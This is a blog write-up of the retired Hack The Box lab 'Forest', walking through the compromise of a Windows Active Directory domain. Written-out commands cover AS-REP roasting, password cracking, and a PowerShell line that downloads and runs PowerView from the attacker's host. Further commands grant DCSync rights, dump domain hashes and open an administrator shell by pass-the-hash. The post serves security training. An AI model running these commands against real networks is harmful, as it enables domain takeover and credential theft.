Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

image

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Thu Jul  8 10:35:07 2021 as: nmap -sC -sV -oA nmap 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up (0.44s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-08 12:43:38Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5h27m46s, deviation: 4h02m31s, median: 3h07m44s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2021-07-08T05:44:09-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-08T12:44:07
|_  start_date: 2021-07-08T04:47:27

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul  8 10:36:53 2021 -- 1 IP address (1 host up) scanned in 106.43 seconds

We have our Nmap scan result but before going deep let try to scan if we have winrm port open.

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.161]
└─$ nmap -sC -sV -p 5985 10.10.10.161  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-10 11:27 WAT
Nmap scan report for htb.local (10.10.10.161)
Host is up (0.68s latency).

PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.65 seconds

Now let start our enumeration on SMB port first.

image

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.161]
└─$ smbclient -L //10.10.10.161/ -N 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

Anonymous login successful but got nothing so i decide to enumerate SMB more with enum4linux but let first add htb.local to our hosts file which is located at /etc/hosts .

enum4linux -a htb.local

image

image

We have some users also a service account svc-alfresco let try to save all users in a txt file.

Administrator
DefaultAccount
krbtgt
sebastien
lucinda
svc-alfresco
andy
mark
muzec
cybery
jelly
sheesh
santi

If Kerberos pre-authentication is disabled on any of the above accounts, we can use the GetNPUsers impacket script to send a request for authentication KDC which will then return a TGT that is encrypted with the user’s password.

GetNPUsers.py -dc-ip htb.local htb.local/svc-alfresco -no-pass

image

Now that we have the user hash let crack it using John The Ripper tools.

                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.161]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:06 DONE (2021-07-10 12:02) 0.1639g/s 669796p/s 669796c/s 669796C/s s4553592..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Boom we have the password s3rvice now let try using it on WinRM port with evil-winrm .

evil-winrm -i htb.local -u svc-alfresco -p 's3rvice'

image

We have user.txt cool right.

System / Administrator

Running winPEAS give a bunch of output so i decided to download SharpHound.exe and upload it on the target.

image

Now let run the program.

./SharpHound.exe

image

We have two output files we need to download it to our machine.

image

Let download the ZIP file.

image

Now that we how the zip file on our machine, we need to upload it to BloodHound. If you don’t have BloodHound installed on your machine, use the following command to install it.

apt-get install bloodhound

We can also download it from github https://github.com/BloodHoundAD/BloodHound/releases .

image

Now let start up the neo4j database.

sudo neo4j console

image

Now let run bloodhound.

./BloodHound --no-sandbox

image

Now let log in with our neo4j credentials. Now let drag and drop the zip file or upload it into BloodHound. Then set the start node to be the svc-alfresco user.

image

Now let right click on the user and select Mark User as Owned.

image

Now we should have a skull head on the user SVC-ALFRESCO@HTB.LOCAL . Now time to analyze.

image

Select Analysis under Pre-Built Analytics Queries click on Shortest Paths to Domain Admins from Owned Principals and we should have the diagram below.

image

We can see that svc-alfresco is a member of the group Service Accounts which is a member of the group Privileged IT Accounts, which is a member of Account Operators. Moreover, the Account Operators group has Generic All permissions on the Exchange Windows Permissions group, which has WriteDacl permissions on the domain.

Now let me try and break it down;

  1. svc-alfresco is not just a member of Service Accounts, but is also a member of the groups Privileged IT Accounts and Account Operators.
  2. The Account Operators group grants limited account creation privileges to a user. Therefore, the user svc-alfresco can create other users on the domain.
  3. The Account Operators group has GenericAll permission on the Exchange Windows Permissions group. This permission essentially gives members full control of the group and therefore allows members to directly modify group membership. Since svc-alfresco is a member of Account Operators, he is able to modify the permissions of the Exchange Windows Permissions group.
  4. The Exchange Windows Permission group has WriteDacl permission on the domain HTB.LOCAL. This permission allows members to modify the DACL (Discretionary Access Control List) on the domain. We’ll abuse this to grant ourselves DcSync privileges, which will give us the right to perform domain replication and dump all the password hashes from the domain.

Now let list our attack path.

  1. Create a user on the domain. This is possible because svc-alfresco is a member of the group Account Operators.
  2. Add the user to the Exchange Windows Permission group. This is possible because svc-alfresco has GenericAll permissions on the Exchange Windows Permissions group.
  3. Give the user DcSync privileges. This is possible because the user is a part of the Exchange Windows Permissions group which has WriteDacl permission on the htb.local domain.
  4. Perform a DcSync attack and dump the password hashes of all the users on the domain.
  5. Perform a Pass the Hash attack to get access to the administrator’s account.

All thanks to Rana Khalil for breaking it down because am also new to Active Directory and using BloodHound.

Now let hit it.

net user itmuzec muzec123 /add /domain

image

Now let Add the user to to the Exchange Windows Permission group.

net group "Exchange Windows Permissions" /add itmuzec

image

We need to give the user DCSync privileges we can use PowerView for this. First let download Powerview and setup a python server in the directory it resides in to transfer it.

image

python -m SimpleHTTPServer

Now let download the script on the target.

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.72:8000/PowerView.ps1')

Time to abuse it.

$SecPassword = ConvertTo-SecureString 'muzec123' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('HTB\itmuzec', $SecPassword)

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity itmuzec -Rights DCSync

Back to our machine now let run secretsdump.py from impacket.

secretsdump.py htb.local/itmuzec:muzec123@10.10.10.161

image

Confirming the Administrator hash with crackmapexec .

crackmapexec smb 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6

image

Boom Now let use psexec.py from Impacket to perform a pass the hash attack with the Administrator’s hash.

psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161

image

We have shell and we are done.

Greeting From Muzec



Back To Home